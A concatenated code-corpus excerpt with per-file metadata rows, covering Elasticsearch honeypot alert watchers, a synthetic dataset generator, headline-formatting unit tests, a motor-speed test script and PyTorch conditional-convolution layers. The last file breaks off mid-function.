'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **Malware Alert:** \n'
'**{{ctx.payload.hits.total}}** new **malware file(s)** was/were discovered in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
# honeytoken alert
self.watcher.put_watch(
id='honeytoken_alerts',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'successful': "true"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for every log matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 0}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
'url': self.mattermost_url,
'headers': {
'Content-Type': 'application/json'},
'body': {
'inline': {
'text': ':heavy_exclamation_mark: **Honeytoken Alert:** \n'
'**{{ctx.payload.hits.total}}** **honeytokens** was/were used in the last 10 seconds. \n'
'For an overview you can use the visualisations in **Kibana**.'}}}}}})
self.watcher.start()
print('\033[94m'+'Watcher Alerts Complete.'+'\033[0m')
| 45.991632 | 149 | 0.302584 | 646 | 10,992 | 5.086687 | 0.184211 | 0.027389 | 0.042605 | 0.057821 | 0.870663 | 0.870663 | 0.839623 | 0.839623 | 0.828971 | 0.828971 | 0 | 0.016242 | 0.585517 | 10,992 | 238 | 150 | 46.184874 | 0.705004 | 0.070597 | 0 | 0.833333 | 0 | 0.026882 | 0.251938 | 0.037295 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010753 | false | 0 | 0.005376 | 0 | 0.032258 | 0.005376 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c0c8a1ef58cecfdb2e6f04413e4f441a62b7b223 | 17,886 | py | Python | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | src/script/generate_synthetic_data.py | FumiyukiKato/HDPView | 9e70ec567086375764fb4adf7ecd879947a48b1b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
from pathlib import Path
import json
root_dir = Path('__file__').resolve().parent
data_dir = root_dir / "data" / "preprocessed"
data_name = "data.csv"
train_name = "train.csv"
test_name = "test.csv"
domain_name = "domain.json"
config_name = "config.json"
def write_data(config, df, domain, index=None):
dataset_name = config['dataset_name']
dataset_name_dir = data_dir / dataset_name
dataset_name_dir.mkdir(parents=True, exist_ok=True)
if index:
df.to_csv(dataset_name_dir / data_name)
else:
df.to_csv(dataset_name_dir / data_name, index=None)
with (dataset_name_dir / domain_name).open(mode="w") as f:
json.dump(domain, f)
with (dataset_name_dir / config_name).open(mode="w") as f:
json.dump(config, f, indent=4)
def rand_geometric(prng, cardinality, data_size, p=0.05):
x1 = np.random.geometric(p, data_size)
bins = np.linspace(x1.min(), x1.max(), cardinality)
return np.digitize(x1, bins=bins) - 1
def rand_uniform(prng, cardinality, data_size):
return prng.randint(0, cardinality, data_size)
def rand_gauss(prng, cardinality, data_size, loc=0, scale=1):
x1 = np.random.normal(loc=loc, scale=scale, size=data_size)
bins = np.linspace(x1.min(), x1.max(), cardinality)
return np.digitize(x1, bins=bins) - 1
def shuffle_attributes(prng, a, cardinality):
tansform_table = prng.permutation(np.arange(cardinality))
transform = np.frompyfunc(lambda value: tansform_table[value], 1, 1)
return transform(a)
def generate_artificial(schema, seed, data_size=0):
"""
Args:
schema ({str: {str: int, str: str}}): {'column name': {'cardinality': int, 'dist': str, 'shuffle': bool}
ex) {'age': {'cardinality': 10, 'dist': 'uniform', 'shuffle': True}, 'race': {...
"""
prng = np.random.RandomState(seed)
generated_data = {}
domain = {}
for column, item in schema.items():
if item['dist'] == "uniform":
generated_data[column] =rand_uniform(prng, item['cardinality'], data_size)
elif item['dist'] == "geometric":
if item.get('p'):
generated_data[column] = rand_geometric(prng, item['cardinality'], data_size, p=item.get('p'))
else:
generated_data[column] = rand_geometric(prng, item['cardinality'], data_size)
elif item['dist'] == "gauss":
generated_data[column] = rand_gauss(prng, item['cardinality'], data_size)
else:
raise Exception("not found dist: %s" % item['dist'])
if item.get('shuffle'):
generated_data[column] = shuffle_attributes(prng, generated_data[column], item['cardinality'])
domain[column] = item['cardinality']
df = pd.DataFrame(generated_data)
return df, domain
def generate_sparse_count_table(schema, seed, data_size=0, sparse_rate=0, p=0.0001):
prng = np.random.RandomState(seed)
domain = { column: item['cardinality'] for column, item in schema.items() }
sparse_size = int(domain_num(domain) * sparse_rate)
x1 = prng.geometric(p, data_size-sparse_size)
counts, _ = np.histogram(x1, range=(x1.min(), x1.max()), bins=sparse_size)
counts = counts + 1
# index= random_indices(prng, domain, sparse_size)
index = continuous_indices(domain, sparse_size)
return pd.DataFrame(counts, index=index), domain
def random_indices(prng, domain, size):
unique_indices = set()
index_size = 0
while index_size < size:
index = tuple([ prng.randint(0, cardinality) for cardinality in domain.values() ])
if index in unique_indices:
continue
else:
unique_indices.add(index)
index_size += 1
return pd.Index(list(unique_indices))
def continuous_indices(domain, size):
indices = []
for i in range(size):
int_indice = [ int(j) for j in list(str(i).zfill(10))]
indices.append(tuple(int_indice))
return pd.Index(indices)
def sparse_rate(df, domain):
return len(df.drop_duplicates()) / np.prod(list(domain.values()), dtype=np.float64)
def domain_num(domain):
return np.prod(list(domain.values()), dtype=np.float64)
def save(config):
df, domain = generate_artificial(schema=config['schema'], seed=config['seed'], data_size=config.get('data_size'))
write_data(config, df, domain)
print(domain)
print('domain size: ', domain_num(domain))
print('data size: ', len(df))
print('sparse rate: ', sparse_rate(df, domain))
def save_sparse_data(config):
df, domain = generate_sparse_count_table(schema=config['schema'], seed=config['seed'], data_size=config.get('data_size'), sparse_rate=config.get('sparse_rate'))
write_data(config, df, domain, True)
print(domain)
print('domain size: ', domain_num(domain))
print('data size: ', df.values.sum())
print('df size', len(df))
return df, domain
if __name__ == '__main__':
config = {
'dataset_name': 'geometric-1e2',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e3',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e4',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e5',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e6',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e7',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e8',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e9',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e10',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e12',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e11',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e14',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e15',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
'14': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'geometric-1e16',
'seed': 0,
'data_size': 100000,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
'10': { 'cardinality': 10, 'dist': 'geometric'},
'11': { 'cardinality': 10, 'dist': 'geometric'},
'12': { 'cardinality': 10, 'dist': 'geometric'},
'13': { 'cardinality': 10, 'dist': 'geometric'},
'14': { 'cardinality': 10, 'dist': 'geometric'},
'15': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save(config)
config = {
'dataset_name': 'sparse-ct-1e-5',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-5,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-5e-6',
'seed': 0,
'data_size': 1000000,
'sparse_rate':5e-6,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-1e-7',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-7,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
save_sparse_data(config)
config = {
'dataset_name': 'sparse-ct-1e-8',
'seed': 0,
'data_size': 1000000,
'sparse_rate':1e-8,
'schema': {
'0': { 'cardinality': 10, 'dist': 'geometric'},
'1': { 'cardinality': 10, 'dist': 'geometric'},
'2': { 'cardinality': 10, 'dist': 'geometric'},
'3': { 'cardinality': 10, 'dist': 'geometric'},
'4': { 'cardinality': 10, 'dist': 'geometric'},
'5': { 'cardinality': 10, 'dist': 'geometric'},
'6': { 'cardinality': 10, 'dist': 'geometric'},
'7': { 'cardinality': 10, 'dist': 'geometric'},
'8': { 'cardinality': 10, 'dist': 'geometric'},
'9': { 'cardinality': 10, 'dist': 'geometric'},
}
}
df, domain = save_sparse_data(config) | 37.734177 | 164 | 0.501733 | 1,754 | 17,886 | 5.019384 | 0.097491 | 0.240686 | 0.314743 | 0.478419 | 0.748864 | 0.716379 | 0.710473 | 0.705929 | 0.677192 | 0.662313 | 0 | 0.057703 | 0.295594 | 17,886 | 474 | 165 | 37.734177 | 0.641083 | 0.014425 | 0 | 0.642512 | 0 | 0 | 0.299063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031401 | false | 0 | 0.009662 | 0.007246 | 0.067633 | 0.019324 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0edf6ae0ecadce7897540336c778885afdf65b3 | 47 | py | Python | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | 8 | 2021-11-13T10:54:21.000Z | 2021-11-30T08:54:45.000Z | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | null | null | null | attacks/__init__.py | HanxunH/MDAttack | fd4107c857f11385685b6daf0de7a455749528d5 | [
"MIT"
] | null | null | null | from . import attack_handler
from . import PGD
| 15.666667 | 28 | 0.787234 | 7 | 47 | 5.142857 | 0.714286 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 29 | 23.5 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
23ce3dd6d07975e32632e9c495ac8ccd8e8af421 | 810 | py | Python | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | test.py | Williamvsd/incomplete_for_students | 01b89a6b11d782b887b5db875fbc03fcd497ff98 | [
"MIT"
] | null | null | null | import model
m = model.Model()
print ("default model: {}".format(m))
print("#### Setting a speed to motor 1 only")
m.m1.speed = 0.1
m.m2.speed = 0.1
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed))
print("#### Setting opposed speed for both motors")
m.m1.speed = 0.1
m.m2.speed = 0.2
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed))
print("#### Setting speed2 = 2xspeed1")
m.m1.speed = 0.1
m.m2.speed = 0.2
print("\n#########\nmodel: {}".format(m))
linear_speed, rotation_speed = m.dk()
print ("linear_speed,={}\nrotational_speed={}".format(linear_speed, rotation_speed)) | 30 | 84 | 0.667901 | 122 | 810 | 4.286885 | 0.237705 | 0.189293 | 0.217973 | 0.275335 | 0.778203 | 0.778203 | 0.778203 | 0.778203 | 0.778203 | 0.741874 | 0 | 0.030137 | 0.098765 | 810 | 27 | 85 | 30 | 0.686301 | 0 | 0 | 0.666667 | 0 | 0 | 0.37238 | 0.136868 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.47619 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
7b6697dc937fd114b1f55c22be81209803c3a76f | 3,840 | py | Python | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | holiness/tests/test_headline.py | MadaoG/holiness | 5b7b836a9db34379a9ea47293d84f6a3be192e61 | [
"MIT"
] | null | null | null | from unittest import TestCase
import holiness
class TestHeadline(TestCase):
def test_basic_headline(self):
h = holiness.headline("headline")
self.assertTrue(h == "========================== H E A D L I N E ===========================")
def test_headline_width(self):
h = holiness.headline("headline", width=42)
self.assertTrue(h == "=========== H E A D L I N E ============")
def test_headline_uppercase(self):
h = holiness.headline("headline", width=42, uppercase=False)
self.assertTrue(h == "=========== h e a d l i n e ============")
def test_headline_spaces(self):
h = holiness.headline("headline", width=42, nr_spaces=0)
self.assertTrue(h == "=============H E A D L I N E==============")
def test_headline_spaces_max(self):
"""too much nr_spaces should not be ignored"""
h = holiness.headline("headline", width=42, nr_spaces=20)
self.assertTrue(h == "= H E A D L I N E =")
def test_headline_sym(self):
h = holiness.headline("headline", width=42, border="#")
self.assertTrue(h == "#========== H E A D L I N E ===========#")
def test_headline_sym_pair_tuple(self):
h = holiness.headline("headline", width=42, border=(">>", "<<"))
self.assertTrue(h == ">>========= H E A D L I N E ==========<<")
def test_headline_sym_pair_list(self):
h = holiness.headline("headline", width=42, border=["/*", "*/"])
self.assertTrue(h == "/*========= H E A D L I N E ==========*/")
def test_headline_sym_mirror(self):
h = holiness.headline("headline", width=42, border="# ")
self.assertTrue(h == "# ========= H E A D L I N E ========== #")
def test_headline_like_c(self):
h = holiness.headline("headline", width=42, border="/*", char="*")
self.assertTrue(h == "/********** H E A D L I N E ***********/")
def test_headline_char(self):
h = holiness.headline("headline", width=42, char="-")
self.assertTrue(h == "----------- H E A D L I N E ------------")
def test_headline_char_sym(self):
h = holiness.headline("headline", width=42, char="-", border="!")
self.assertTrue(h == "!---------- H E A D L I N E -----------!")
def test_headline_char_sym_equal(self):
h = holiness.headline("headline", width=42, char="-", border="=")
self.assertTrue(h == "=---------- H E A D L I N E -----------=")
def test_headline_spacesym(self):
h = holiness.headline("headline", width=42, spacesym="_")
self.assertTrue(h == "===========__H_E_A_D_L_I_N_E__============")
def test_headline_surround(self):
h = holiness.headline("headline", width=42, surround=True)
self.assertTrue(h ==
"==========================================\n" +
"=========== H E A D L I N E ============\n" +
"=========================================="
)
def test_headline_all(self):
h = holiness.headline(
"headline",
width=42,
surround=True,
border="% ",
char="~",
spacesym="~",
nr_spaces=4,
uppercase=False
)
self.assertTrue(h ==
"% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ %\n" +
"% ~~~~~~~~~~~h~e~a~d~l~i~n~e~~~~~~~~~~~~ %\n" +
"% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ %")
def test_headline_char_multiple(self):
h = holiness.headline("headline", width=42, char="+-")
self.assertTrue(h == "+-+-+-+-+-+ H E A D L I N E +-+-+-+-+-+-")
| 42.197802 | 104 | 0.445313 | 437 | 3,840 | 3.773455 | 0.116705 | 0.072165 | 0.175258 | 0.257732 | 0.858702 | 0.824136 | 0.824136 | 0.756216 | 0.682232 | 0.624015 | 0 | 0.013211 | 0.290365 | 3,840 | 90 | 105 | 42.666667 | 0.591927 | 0.010417 | 0 | 0.057143 | 0 | 0 | 0.289141 | 0.077754 | 0 | 0 | 0 | 0 | 0.242857 | 1 | 0.242857 | false | 0 | 0.028571 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ba2e8a1acde39e06913ba80d6d0d7a856d824f2 | 14,041 | py | Python | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | 4 | 2022-01-20T13:52:55.000Z | 2022-03-30T08:46:51.000Z | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | 1 | 2022-03-09T07:10:54.000Z | 2022-03-09T07:10:54.000Z | lib/models/condconv.py | CFM-MSG/Code_CDN | b7d21cd4234ef55443dd60d7c48166085f93253c | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn.modules.conv import _ConvNd
from torch.nn.modules.utils import _single, _pair
class CondConv1d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.5, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
self.isbias = bias
super(CondConv1d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.num_workers = num_workers
# self.weights = nn.Parameter(torch.Tensor(num_workers, in_channels, out_channels // groups, kernel_size[0]))
self.weight = nn.Parameter(
self.weight.view(in_channels, out_channels, kernel_size[0], num_workers))
if bias:
self.bias = nn.Parameter(self.bias.view(out_channels, num_workers))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x): # batchsize * 512 * 16 batchsize * 512
# x_shape = x.shape
# 结合x
# mix_feature = torch.tanh(
# self.att_linear1(att_x) + self.att_linear2(nn.functional.avg_pool1d(x, x_shape[2]).squeeze()))
# 单纯使用word
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.sum(attention[:, None, None, None, :] * self.weight[None, :, :, :, :], 4)
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
biases = torch.sum(attention[:, None, :] * self.bias[None, :, :], 2)
for input_tensor, one_kernel, one_bias in zip(inputs, kernel, biases):
t_out = nn.functional.conv1d(input_tensor, one_kernel, one_bias, self.stride, self.padding,
self.dilation,
self.groups)
output.append(t_out)
else:
for input_tensor, one_kernel in zip(inputs, kernel):
t_out = nn.functional.conv1d(input_tensor, one_kernel, None, self.stride, self.padding, self.dilation,
self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
class CondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(CondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.num_workers = num_workers
# self.weights = nn.Parameter(torch.Tensor(num_workers, in_channels, out_channels // groups, kernel_size[0]))
self.weight = nn.Parameter(
self.weight.view(in_channels, out_channels, kernel_size[0], kernel_size[1], num_workers))
if bias:
self.bias = nn.Parameter(self.bias.view(out_channels, num_workers))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True): # batchsize * 512 * 16 batchsize * 512
if att_with_x:
# 结合x
mix_feature = torch.tanh(
self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze()))
else:
# 单纯使用word
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
